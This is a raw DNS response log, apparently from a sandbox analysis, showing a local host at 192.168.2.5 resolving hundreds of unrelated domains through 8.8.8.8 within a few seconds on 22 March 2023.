Mar 22, 2023 05:44:46.582384109 CET	8.8.8.8	192.168.2.5	0x2d4e	No error (0)	nme.co.jp		203.0.113.0	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.607851028 CET	8.8.8.8	192.168.2.5	0x3361	No error (0)	ntc.edu.au		192.124.249.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.651303053 CET	8.8.8.8	192.168.2.5	0xc348	No error (0)	invictus.pl		193.107.88.74	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.674887896 CET	8.8.8.8	192.168.2.5	0x6f63	No error (0)	slower.it		127.0.0.11	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.685328007 CET	8.8.8.8	192.168.2.5	0x36cd	No error (0)	willsub.com		69.89.107.122	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.686400890 CET	8.8.8.8	192.168.2.5	0xb88a	No error (0)	tabbles.net		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.686400890 CET	8.8.8.8	192.168.2.5	0xb88a	No error (0)	tabbles.net		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.696280003 CET	8.8.8.8	192.168.2.5	0xbfb6	No error (0)	kairel.com		54.217.118.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.719868898 CET	8.8.8.8	192.168.2.5	0x1cae	No error (0)	portoccd.org		51.89.6.56	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.771610022 CET	8.8.8.8	192.168.2.5	0xf6e2	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.797851086 CET	8.8.8.8	192.168.2.5	0x32a	No error (0)	zugseil.com		92.42.191.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.813426018 CET	8.8.8.8	192.168.2.5	0x6a1e	No error (0)	hazmatt.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.825429916 CET	8.8.8.8	192.168.2.5	0xac0	No error (0)	t-trust.jp		183.181.82.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.852159977 CET	8.8.8.8	192.168.2.5	0x289a	No error (0)	106west.com		148.130.4.196	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.852310896 CET	8.8.8.8	192.168.2.5	0x9870	No error (0)	daytonir.com		104.18.40.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.852310896 CET	8.8.8.8	192.168.2.5	0x9870	No error (0)	daytonir.com		172.64.147.213	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.854732037 CET	8.8.8.8	192.168.2.5	0xc631	No error (0)	dyag-eng.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.871968985 CET	8.8.8.8	192.168.2.5	0x2dad	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.879452944 CET	8.8.8.8	192.168.2.5	0xa3ea	No error (0)	usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.956394911 CET	8.8.8.8	192.168.2.5	0xd0b0	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.969424963 CET	8.8.8.8	192.168.2.5	0x7f2f	No error (0)	forbin.net		104.21.41.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.969424963 CET	8.8.8.8	192.168.2.5	0x7f2f	No error (0)	forbin.net		172.67.148.35	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.972839117 CET	8.8.8.8	192.168.2.5	0xfc17	No error (0)	missnue.com		104.21.234.120	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.972839117 CET	8.8.8.8	192.168.2.5	0xfc17	No error (0)	missnue.com		104.21.234.121	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.982852936 CET	8.8.8.8	192.168.2.5	0x95c9	No error (0)	xult.org		65.52.128.33	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.018651009 CET	8.8.8.8	192.168.2.5	0xe06d	No error (0)	dyag-eng.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.087594986 CET	8.8.8.8	192.168.2.5	0x4ab4	No error (0)	coxkitchensandbaths.com		205.149.134.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.101162910 CET	8.8.8.8	192.168.2.5	0x7f9f	No error (0)	wvs-net.de		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.101162910 CET	8.8.8.8	192.168.2.5	0x7f9f	No error (0)	wvs-net.de		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.103682995 CET	8.8.8.8	192.168.2.5	0xbe53	No error (0)	dog-jog.net		153.122.24.177	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.116270065 CET	8.8.8.8	192.168.2.5	0xef6c	No error (0)	kallman.net		185.76.64.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.212691069 CET	8.8.8.8	192.168.2.5	0x43ed	No error (0)	karmy.com.pl		185.253.212.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.268948078 CET	8.8.8.8	192.168.2.5	0x2935	No error (0)	www.reglera.com	reglera.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:47.268948078 CET	8.8.8.8	192.168.2.5	0x2935	No error (0)	reglera.com		64.125.133.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.280169964 CET	8.8.8.8	192.168.2.5	0x4e42	No error (0)	dbnet.at		188.94.254.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.293701887 CET	8.8.8.8	192.168.2.5	0x641b	No error (0)	4locals.net		80.82.115.227	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.309636116 CET	8.8.8.8	192.168.2.5	0x4841	No error (0)	icd-host.com		192.252.159.116	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.309636116 CET	8.8.8.8	192.168.2.5	0x4841	No error (0)	icd-host.com		192.252.159.165	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.313055992 CET	8.8.8.8	192.168.2.5	0xcf86	No error (0)	atb-lit.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.316626072 CET	8.8.8.8	192.168.2.5	0x56ca	No error (0)	pertex.com		185.151.30.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.318960905 CET	8.8.8.8	192.168.2.5	0x656e	No error (0)	adeesa.net		104.21.77.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.318960905 CET	8.8.8.8	192.168.2.5	0x656e	No error (0)	adeesa.net		172.67.209.11	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.324925900 CET	8.8.8.8	192.168.2.5	0x946e	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.342129946 CET	8.8.8.8	192.168.2.5	0xcfc8	No error (0)	atbauk.org		172.67.196.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.342129946 CET	8.8.8.8	192.168.2.5	0xcfc8	No error (0)	atbauk.org		104.21.92.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.396380901 CET	8.8.8.8	192.168.2.5	0x50f7	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.401530981 CET	8.8.8.8	192.168.2.5	0x5b3b	No error (0)	fogra.com.pl		85.128.55.51	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.423798084 CET	8.8.8.8	192.168.2.5	0x7957	No error (0)	top1oil.com		104.26.1.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.423798084 CET	8.8.8.8	192.168.2.5	0x7957	No error (0)	top1oil.com		104.26.0.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.423798084 CET	8.8.8.8	192.168.2.5	0x7957	No error (0)	top1oil.com		172.67.71.55	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.426543951 CET	8.8.8.8	192.168.2.5	0x3476	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.435389042 CET	8.8.8.8	192.168.2.5	0x38de	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.493940115 CET	8.8.8.8	192.168.2.5	0x516	No error (0)	rkengg.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:47.493940115 CET	8.8.8.8	192.168.2.5	0x516	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:47.493940115 CET	8.8.8.8	192.168.2.5	0x516	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.493940115 CET	8.8.8.8	192.168.2.5	0x516	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.535823107 CET	8.8.8.8	192.168.2.5	0xea6a	No error (0)	shteeble.com		185.106.129.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.642812014 CET	8.8.8.8	192.168.2.5	0xc5f8	No error (0)	umcor.am		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.642812014 CET	8.8.8.8	192.168.2.5	0xc5f8	No error (0)	umcor.am		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.653211117 CET	8.8.8.8	192.168.2.5	0x55c8	No error (0)	okashimo.com		203.137.75.45	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.666429996 CET	8.8.8.8	192.168.2.5	0x7158	No error (0)	peminet.net		198.54.117.242	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.683907032 CET	8.8.8.8	192.168.2.5	0x8491	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.727785110 CET	8.8.8.8	192.168.2.5	0x7a57	No error (0)	kursavto.ru		31.177.76.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.727785110 CET	8.8.8.8	192.168.2.5	0x7a57	No error (0)	kursavto.ru		31.177.80.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.734615088 CET	8.8.8.8	192.168.2.5	0xb206	Name error (3)	agitz.com.br	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.745321035 CET	8.8.8.8	192.168.2.5	0x28e1	No error (0)	mondopp.net		173.231.184.124	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.771066904 CET	8.8.8.8	192.168.2.5	0xedad	No error (0)	htsmx.net		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.777158022 CET	8.8.8.8	192.168.2.5	0xdbbc	No error (0)	host.do		217.79.248.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.806231976 CET	8.8.8.8	192.168.2.5	0x1092	No error (0)	kumaden.com		49.212.180.178	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.811333895 CET	8.8.8.8	192.168.2.5	0xf2d9	No error (0)	refintl.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.811333895 CET	8.8.8.8	192.168.2.5	0xf2d9	No error (0)	refintl.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.811333895 CET	8.8.8.8	192.168.2.5	0xf2d9	No error (0)	refintl.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.811333895 CET	8.8.8.8	192.168.2.5	0xf2d9	No error (0)	refintl.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.860997915 CET	8.8.8.8	192.168.2.5	0x2d13	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.887229919 CET	8.8.8.8	192.168.2.5	0x23c3	Name error (3)	agitz.com.br	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.906763077 CET	8.8.8.8	192.168.2.5	0x60bb	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.947417021 CET	8.8.8.8	192.168.2.5	0xa173	No error (0)	portoccd.org		51.89.6.56	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.961846113 CET	8.8.8.8	192.168.2.5	0x8602	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.963356018 CET	8.8.8.8	192.168.2.5	0xcb8d	No error (0)	pertex.com		185.151.30.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.009361982 CET	8.8.8.8	192.168.2.5	0xf2f6	No error (0)	top1oil.com		172.67.71.55	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.009361982 CET	8.8.8.8	192.168.2.5	0xf2f6	No error (0)	top1oil.com		104.26.1.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.009361982 CET	8.8.8.8	192.168.2.5	0xf2f6	No error (0)	top1oil.com		104.26.0.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.012552023 CET	8.8.8.8	192.168.2.5	0xe717	No error (0)	popbook.com		47.91.167.60	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.061085939 CET	8.8.8.8	192.168.2.5	0x9d50	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.070802927 CET	8.8.8.8	192.168.2.5	0x51c2	No error (0)	daytonir.com		104.18.40.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.070802927 CET	8.8.8.8	192.168.2.5	0x51c2	No error (0)	daytonir.com		172.64.147.213	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.228625059 CET	8.8.8.8	192.168.2.5	0xab19	No error (0)	missnue.com		104.21.234.121	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.228625059 CET	8.8.8.8	192.168.2.5	0xab19	No error (0)	missnue.com		104.21.234.120	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.380641937 CET	8.8.8.8	192.168.2.5	0xb3e7	No error (0)	mail.airmail.net		66.226.70.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.381844044 CET	8.8.8.8	192.168.2.5	0xef5a	No error (0)	ldh.la.gov		75.2.95.235	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.399615049 CET	8.8.8.8	192.168.2.5	0x2eb0	No error (0)	pers.com		192.124.249.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.431792974 CET	8.8.8.8	192.168.2.5	0x20a6	No error (0)	biosolve.com		151.101.130.159	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.527570963 CET	8.8.8.8	192.168.2.5	0x8dbc	No error (0)	wvs-net.de		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.527570963 CET	8.8.8.8	192.168.2.5	0x8dbc	No error (0)	wvs-net.de		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.548605919 CET	8.8.8.8	192.168.2.5	0xb2b4	No error (0)	burstner.ru		62.122.170.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.619185925 CET	8.8.8.8	192.168.2.5	0xee8a	Name error (3)	agitz.com.br	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.631316900 CET	8.8.8.8	192.168.2.5	0x3820	No error (0)	aoinko.net		157.7.107.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.643835068 CET	8.8.8.8	192.168.2.5	0x12f0	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.655670881 CET	8.8.8.8	192.168.2.5	0xd22	No error (0)	scintel.com		23.239.201.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.724530935 CET	8.8.8.8	192.168.2.5	0xbbb	No error (0)	araax.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:48.724530935 CET	8.8.8.8	192.168.2.5	0xbbb	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:48.724530935 CET	8.8.8.8	192.168.2.5	0xbbb	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.724530935 CET	8.8.8.8	192.168.2.5	0xbbb	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.771368980 CET	8.8.8.8	192.168.2.5	0x6b8e	No error (0)	johnlyon.org		141.193.213.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.875821114 CET	8.8.8.8	192.168.2.5	0xac72	No error (0)	calvinly.com		216.239.32.21	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.875821114 CET	8.8.8.8	192.168.2.5	0xac72	No error (0)	calvinly.com		216.239.34.21	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.875821114 CET	8.8.8.8	192.168.2.5	0xac72	No error (0)	calvinly.com		216.239.38.21	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.875821114 CET	8.8.8.8	192.168.2.5	0xac72	No error (0)	calvinly.com		216.239.36.21	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.964073896 CET	8.8.8.8	192.168.2.5	0xf62e	No error (0)	4locals.net		80.82.115.227	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.072128057 CET	8.8.8.8	192.168.2.5	0x208a	No error (0)	touchfam.ca		15.197.142.173	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.072128057 CET	8.8.8.8	192.168.2.5	0x208a	No error (0)	touchfam.ca		3.33.152.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.181015968 CET	8.8.8.8	192.168.2.5	0xfb40	No error (0)	sanfotek.net		97.74.42.79	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.213839054 CET	8.8.8.8	192.168.2.5	0x829b	No error (0)	missnue.com		104.21.234.120	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.213839054 CET	8.8.8.8	192.168.2.5	0x829b	No error (0)	missnue.com		104.21.234.121	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.281656981 CET	8.8.8.8	192.168.2.5	0xa7c5	No error (0)	nolaoig.org		54.212.145.129	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.362199068 CET	8.8.8.8	192.168.2.5	0x7f39	No error (0)	rappich.de		89.31.143.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.376084089 CET	8.8.8.8	192.168.2.5	0x5fcc	No error (0)	ascc.org.au		203.210.102.34	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.414030075 CET	8.8.8.8	192.168.2.5	0xea9b	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.442384958 CET	8.8.8.8	192.168.2.5	0xb01f	No error (0)	plaske.ua		52.211.245.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.469808102 CET	8.8.8.8	192.168.2.5	0x5309	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.488466024 CET	8.8.8.8	192.168.2.5	0xad8b	Name error (3)	chzko.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.503242016 CET	8.8.8.8	192.168.2.5	0x5f90	No error (0)	forbin.net		172.67.148.35	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.503242016 CET	8.8.8.8	192.168.2.5	0x5f90	No error (0)	forbin.net		104.21.41.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.527847052 CET	8.8.8.8	192.168.2.5	0x4140	No error (0)	bount.com.tw		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.527847052 CET	8.8.8.8	192.168.2.5	0x4140	No error (0)	bount.com.tw		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.527870893 CET	8.8.8.8	192.168.2.5	0x1660	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.530925035 CET	8.8.8.8	192.168.2.5	0xb667	No error (0)	ifesnet.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.530925035 CET	8.8.8.8	192.168.2.5	0xb667	No error (0)	ifesnet.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.541563988 CET	8.8.8.8	192.168.2.5	0x754e	No error (0)	apcotex.com		35.154.163.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.551367998 CET	8.8.8.8	192.168.2.5	0xd406	No error (0)	amic.at		78.46.224.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.577737093 CET	8.8.8.8	192.168.2.5	0x5888	No error (0)	revoldia.net		45.200.235.135	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.585041046 CET	8.8.8.8	192.168.2.5	0xa8dd	No error (0)	eos-i.com	macx1980.qy56.supcname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:49.585041046 CET	8.8.8.8	192.168.2.5	0xa8dd	No error (0)	macx1980.qy56.supcname.com	mfddos.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:49.585041046 CET	8.8.8.8	192.168.2.5	0xa8dd	No error (0)	mfddos.datacname.com	15.204.18.132.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:49.585041046 CET	8.8.8.8	192.168.2.5	0xa8dd	No error (0)	15.204.18.132.datacname.com		15.204.18.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.593354940 CET	8.8.8.8	192.168.2.5	0x5eb5	No error (0)	ossir.org		51.159.3.117	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.633424997 CET	8.8.8.8	192.168.2.5	0xdadb	No error (0)	siongann.com		104.21.8.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.633424997 CET	8.8.8.8	192.168.2.5	0xdadb	No error (0)	siongann.com		172.67.156.237	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.639516115 CET	8.8.8.8	192.168.2.5	0x5224	No error (0)	smitko.net		31.15.12.103	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.692019939 CET	8.8.8.8	192.168.2.5	0xbdb6	No error (0)	vonparis.com		23.185.0.4	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.694658041 CET	8.8.8.8	192.168.2.5	0x5e49	No error (0)	pers.com		192.124.249.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.741600037 CET	8.8.8.8	192.168.2.5	0x54cc	No error (0)	redgiga.com		172.67.186.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.741600037 CET	8.8.8.8	192.168.2.5	0x54cc	No error (0)	redgiga.com		104.21.76.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.781071901 CET	8.8.8.8	192.168.2.5	0x99a7	No error (0)	mikihan.com		153.126.211.112	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.842061996 CET	8.8.8.8	192.168.2.5	0xec15	No error (0)	vivastay.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:49.842061996 CET	8.8.8.8	192.168.2.5	0xec15	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:49.842061996 CET	8.8.8.8	192.168.2.5	0xec15	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.842061996 CET	8.8.8.8	192.168.2.5	0xec15	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.844851971 CET	8.8.8.8	192.168.2.5	0x3e75	No error (0)	uster.com		104.20.221.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.844851971 CET	8.8.8.8	192.168.2.5	0x3e75	No error (0)	uster.com		172.67.32.172	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.844851971 CET	8.8.8.8	192.168.2.5	0x3e75	No error (0)	uster.com		104.20.220.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.940675020 CET	8.8.8.8	192.168.2.5	0x2e80	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.957254887 CET	8.8.8.8	192.168.2.5	0xfff7	No error (0)	popbook.com		47.91.167.60	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.967706919 CET	8.8.8.8	192.168.2.5	0x5bb	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.970771074 CET	8.8.8.8	192.168.2.5	0x16a6	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.040788889 CET	8.8.8.8	192.168.2.5	0xb4d8	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.060904026 CET	8.8.8.8	192.168.2.5	0x4e24	No error (0)	assideum.com		52.219.103.64	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.064429045 CET	8.8.8.8	192.168.2.5	0x8387	No error (0)	iranytu.net		103.224.212.222	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.089178085 CET	8.8.8.8	192.168.2.5	0x353d	No error (0)	any-s.net		108.170.12.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.098507881 CET	8.8.8.8	192.168.2.5	0x298c	No error (0)	portoccd.org		51.89.6.56	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.188920975 CET	8.8.8.8	192.168.2.5	0xdb56	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.233639002 CET	8.8.8.8	192.168.2.5	0xb50c	No error (0)	envogen.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.233639002 CET	8.8.8.8	192.168.2.5	0xb50c	No error (0)	envogen.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.284924984 CET	8.8.8.8	192.168.2.5	0xc873	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.301095009 CET	8.8.8.8	192.168.2.5	0x8cd7	Name error (3)	www.koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.309129000 CET	8.8.8.8	192.168.2.5	0x3a0f	No error (0)	scip.org.uk		104.26.13.244	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.309129000 CET	8.8.8.8	192.168.2.5	0x3a0f	No error (0)	scip.org.uk		172.67.72.150	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.309129000 CET	8.8.8.8	192.168.2.5	0x3a0f	No error (0)	scip.org.uk		104.26.12.244	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.324331045 CET	8.8.8.8	192.168.2.5	0x4133	No error (0)	burstner.ru		62.122.170.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.388413906 CET	8.8.8.8	192.168.2.5	0xe24e	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.401437044 CET	8.8.8.8	192.168.2.5	0xb228	No error (0)	www.usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.434190035 CET	8.8.8.8	192.168.2.5	0x9b56	No error (0)	skgm.ru		91.201.52.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.437403917 CET	8.8.8.8	192.168.2.5	0x6045	No error (0)	ccrsi.org		198.209.253.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.619765997 CET	8.8.8.8	192.168.2.5	0x2916	No error (0)	valselit.com		193.70.68.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.692454100 CET	8.8.8.8	192.168.2.5	0x354b	No error (0)	atb-lit.com		208.100.26.245	A (IP address)	IN (0x0001)	false
